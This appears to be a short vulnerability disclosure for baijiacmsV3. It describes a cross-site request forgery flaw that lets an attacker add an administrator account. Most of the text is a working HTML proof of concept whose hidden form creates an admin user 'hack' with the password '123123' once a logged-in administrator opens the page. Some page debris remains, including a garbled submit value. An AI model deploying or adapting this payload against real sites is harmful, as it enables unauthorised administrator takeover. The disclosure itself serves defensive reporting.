
baijiacmsV3 CSRF add admin
There is a CSRF vulnerability that can add the administrator account
After the administrator logged in,open the following one page.
POC:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
|
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/baijiacmsV3-master/index.php?mod=site&op=edituser&name=manager&do=user" method="POST" enctype="multipart/form-data"> <input type="hidden" name="id" value="" /> <input type="hidden" name="username" value="hack" /> <input type="hidden" name="is_admin" value="1" /> <input type="hidden" name="store" value="0" /> <input type="hidden" name="newpassword" value="123123" /> <input type="hidden" name="confirmpassword" value="123123" /> <input type="hidden" name="submit" value=" � 浜¤ " /> <input type="submit" value="Submit request" /> </form> </body> </html>
|
For example:



近期评论